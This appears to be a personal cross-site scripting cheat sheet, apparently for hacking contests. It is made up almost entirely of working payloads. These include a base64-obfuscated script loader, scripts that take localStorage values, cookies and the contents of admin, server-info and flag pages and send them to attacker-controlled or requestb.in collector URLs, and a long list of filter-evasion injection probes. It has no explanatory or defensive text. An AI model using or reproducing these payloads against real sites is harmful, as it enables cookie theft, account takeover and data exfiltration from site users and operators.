insert below script into vulnerable site # change {base64 encoded url to javascript code} to base64 encoded url to javascript code

 <img src='a' onerror='var p=document.createElement(`script`);p.setAttribute(`src`,atob(`{base64 encoded url to javascript code}`));document.body.appendChild(p);' />

open below file to the internet.

 '''
  var i = 0;
  var result = "";
  for (i = 0; i < localStorage.length; i++) {
    var key = localStorage[localStorage.key(i)];
    result = result + ":::" + key;
  }
  result = result + ":::" + document.cookie;
  window.location = "http://{site we control}/aa?nkey=" + btoa(result);
  '''

---------------------

<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "/put.php");
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send(JSON.stringify({id:"your_team_id", prelabel:"", "newlabel": localStorage.getItem('KEY'), "encpass": "02ed7dff48e11c2a49f655ae1eb1d952", iv:"128bd85c6e4b9ac8616cfbdd2a3dca6a"}));
</script>

----------------------
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","/admin/show.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/xxxx",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));'

------------------------

xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","/admin/server_info.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/xxxx",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));



------------------------
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://requestb.in/rnk0ghrn");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send(document.cookie);
</script>

<script>
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","flag.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/121znd91",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));
</script>

<script language= "JavaScript">document.location="http://requestb.in/1ddpbis1?cookie=" + document.cookie;document.location="http://requestb.in/1ddpbis1"</script>


</script>"><script>prompt(1)</script>
</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>

